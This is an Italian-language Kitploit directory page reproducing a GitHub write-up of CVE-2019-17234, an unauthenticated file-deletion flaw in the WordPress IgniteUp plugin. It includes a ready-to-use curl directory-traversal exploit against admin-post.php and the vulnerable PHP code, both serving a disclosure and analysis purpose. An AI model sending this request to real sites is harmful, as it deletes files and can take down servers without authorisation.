Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-17234b-Exploit — Wordpress IgniteUp plugin < 3.4.1 permette a utenti non autenticati di eliminare arbitrariamente file sul server web causando potenzialmente un DoS. | Kitploit
Strumenti/GitHubGitHub/administra1tor/cve-2019-17234b-exploit
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubadministra1tor/cve-2019-17234b-exploit

CVE-2019-17234b-Exploit

Wordpress IgniteUp plugin < 3.4.1 permette a utenti non autenticati di eliminare arbitrariamente file sul server web causando potenzialmente un DoS.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
5 anni faNon ancora revisionato

Vulnerabilità del plugin Wordpress IgniteUp

Il plugin Wordpress IgniteUp v3.4 e versioni precedenti consente a utenti remoti non autenticati di eliminare potenzialmente qualsiasi file sul server web di destinazione, causando possibilmente un attacco Denial of Service.

Cronologia CVE-2019-17234

La vulnerabilità è stata segnalata al team di wordpress.org il 20 settembre 2019 e una nuova versione del plugin 3.4.1 è stata rilasciata l'8 novembre 2019.[3]

Contesto

IgniteUp è un popolare plugin Wordpress per eseguire la configurazione e la gestione di pagine di destinazione del sito web per far sapere agli utenti che il sito è in arrivo, in manutenzione o in costruzione.

Il plugin viene fornito con 5 modelli predefiniti gratuiti: believe, cleaner, glass, launcher, offline.

I nomi dei modelli sono evidenziati poiché è richiesto un parametro [template-name] corretto per eseguire una richiesta valida al server web per sfruttare la vulnerabilità.

Codice exploit (curl)

[AVVERTENZA]

Il seguente comando di esempio potrebbe essere sufficiente per rompere il tuo sito Wordpress, in questo caso eliminando i file principali del plugin IgniteUp.

root@kitploit:~
curl -d "action=admin_init&delete_template=[template-name]/../../" -X POST http(s)://[target-website]/wp-admin/admin-post.php

dummy example:
curl -d "action=admin_init&delete_template=believe/../../" -X POST http://localhost/wp-admin/admin-post.php

[NOTA] Il comando precedente esegue un directory traversal all'interno del percorso relativo del plugin; con i permessi appropriati (755 per le directory del server web e 644 per i file del server web) e chowner (utente www-data, apache ecc.), la superficie di attacco è limitata fino alla directory root del server (ad es. /var/www/html).

Analisi del codice della vulnerabilità

La funzione responsabile che introduce questa vulnerabilità è evidenziata di seguito; il file di riferimento si trova in wp-content/plugins/igniteup/includes/class-coming-soon-creator.php, file che, come suggerisce il nome, gestisce la creazione di nuovi modelli personalizzati e l'eliminazione di quelli predefiniti/creati.

V3.4

root@kitploit:~
add_action('admin_init', array($this, 'deleteTemplate'));
...
...
public function deleteTemplate()
{
   if (!isset($_POST['delete_template']) || empty($_POST['delete_template']))
      return;
   $folder_name = $_POST['delete_template'];
   $path = dirname(CSCS_FILE) . '/includes/templates/';
   array_map('unlink', glob($path . $folder_name . '/*.*'));
   rmdir($path . $folder_name);
   unlink($path . '/' . $folder_name . '.php');
   header('Location: ' . $_SERVER['REQUEST_URI']);
}

admin_init sulla prima riga è un hook di azione di Wordpress. Gli hook[2] costituiscono la base per come plugin e temi interagiscono con il core di Wordpress, ma sono anche ampiamente utilizzati dal core stesso.

Purtroppo la funzione associata all'hook di azione, deleteTemplate(), non ha controlli di amministratore/utente; fornisce al lettore abbastanza indizi su come eseguire tale azione. Guardando il codice è banale individuare il parametro POST php delete_template; questo, sommato all'azione dell'hook admin_init, è conoscenza sufficiente per tentare di eseguire una richiesta POST al server web tramite l'interfaccia /wp-admin/admin-post.php come indicato nel paragrafo del codice exploit.

[NOTA PERSONALE] Analizzando il comportamento usuale del plugin da una prospettiva di amministratore Wordpress, è piuttosto strano trovare questa funzione (suppongo sia un residuo di versioni precedenti), per i seguenti motivi:

  1. Nessuna opzione di eliminazione del modello è disponibile nella v3.4 dal pannello di amministrazione, solo attivazione/disattivazione del plugin o "creazione" (download) di modelli premium ($$$).
  2. Il comportamento del codice è sostanzialmente errato; la funzione unlink() in circostanze normali non terminerà mai correttamente poiché, nella costruzione del parametro della funzione, il '/' tra $path e $folder_name non dovrebbe essere presente, una barra è già stata aggiunta nella dichiarazione della variabile $path.

Ecco un esempio di cosa accade durante unlink quando provo a distruggere un modello.

attack.png

DA FARE

test admin-ajax.php confronto v3.4.1

Autori

  • Andrea Vignudelli -(https://github.com/administra1tor)

Riferimenti

  • Ringraziamenti a Jerome Bruandet per aver segnalato il problema.

[fonte] https://blog.nintechnet.com/multiple-vulnerabilities-in-wordpress-igniteup-coming-soon-and-maintenance-mode-plugin/

[1] changelog v3.4.1 - https://it.wordpress.org/plugins/igniteup/#developers

[2] Hook Wordpress - https://developer.wordpress.org/plugins/hooks/

[3] Riferimento NIST CVE-2019-17234 - https://nvd.nist.gov/vuln/detail/CVE-2019-17234

Scarica lo strumento